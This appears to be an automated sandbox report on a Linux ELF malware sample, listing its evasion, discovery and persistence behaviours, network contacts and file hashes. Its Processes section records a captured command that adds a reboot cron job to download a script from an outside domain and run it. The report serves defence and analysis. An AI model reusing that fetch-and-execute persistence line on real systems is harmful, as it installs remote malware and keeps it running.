Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-czw7fsznhk
Target 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
SHA256 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443

Threat Level: Shows suspicious behavior

The file 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:31

Reported

2024-10-27 02:33

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

149s

Max time network

139s

Command Line

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 152.53.15.127 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.1cgCnI /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/861/cmdline /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/270/cmdline /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1458/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1410/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1368/cmdline /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1431/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1/cmdline /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1454/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1455/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1459/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1460/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1463/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1465/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1405/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1422/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1432/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1466/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1457/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1461/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1462/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1464/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1467/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/mounts /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1437/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1456/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A
File opened for reading /proc/1468/status /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf N/A

Processes

/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 152.53.15.127:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:13831 kingstonwikkerink.dyn tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp

Files

/var/spool/cron/crontabs/tmp.1cgCnI

MD5 050970160d674c8e3e883f557c869f9c
SHA1 9f62fac10caa5e0f6f9642947ef6e7b8e3418dbc
SHA256 f93a301e05ee4495bf0a2c767c9a61a4f084c19bc08f618c5a0118533391f203
SHA512 584e048471b1d5f554923779f088f10a26d72e6d04200b5cd4049191837de7484b46c578448223888ea5bf054412966bc216818d6fbc03800f39432683f67a10